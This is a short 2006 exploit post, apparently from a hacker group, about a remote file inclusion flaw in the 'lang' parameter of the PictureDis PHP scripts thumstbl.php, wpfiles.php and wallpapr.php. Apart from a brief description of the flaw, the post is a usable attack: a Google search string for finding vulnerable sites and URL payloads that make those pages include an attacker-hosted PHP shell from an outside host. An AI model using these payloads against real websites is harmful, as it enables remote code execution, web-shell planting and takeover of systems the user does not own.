************************************************************************
**************************

PictureDis Products "lang" Parameter File Inclusion Vulnerability

=================================================

Input passed to the "lang" parameter in thumstbl.php, wpfiles.php,

and wallpapr.php is not properly verified before being used to

include files. This can be exploited to execute arbitrary PHP code by

including files.

************************************************************************
*********************

exploit:

in google search: inurl:thumstbl.php

and add the phpshell

thumstbl.php?lang=[ur phpshell ]

wpfiles.php?lang=[ur phpshell ]

wallpapr.php?lang=[ur phpshell ]

******************************************************************

exemple: http://localhost//album/wpfiles.php?lang=http://your site.com/ur script.txt?

*************************************************

by s4mi(rOoT-HacKeD)rOoT-HaCkeD[AT]Hotmail[dot]com

====================================

tanx to ==>SIMO64==>DrAcKaNz==>HaRDoSe==>

*************************************************

black spell te4m [15-06-2006]

end (-:

*************************************************

[ reply ]